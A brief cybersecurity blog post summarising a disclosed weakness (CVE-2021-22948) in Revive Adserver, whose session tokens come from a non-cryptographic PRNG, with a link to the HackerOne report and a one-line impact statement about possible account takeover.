This blog is all about Cyber Security and IT

Thursday, July 25, 2024

Use of a Broken or Risky Cryptographic Algorithm


 

Revive-ad server utilizes a PRNG for session-token generation, this means that an attacker could theoretically be able to generate session tokens at random and take over accounts at random.
 
This function does not generate crypto-graphically secure values, and should not be used for cryptographic purposes.
 
CVE-2021-22948
 Refer report: https://hackerone.com/reports/1306942

Impact

This vulnerability is capable of allowing mass account takeover by having attackers generate other users' session tokens.

0 comments:

Post a Comment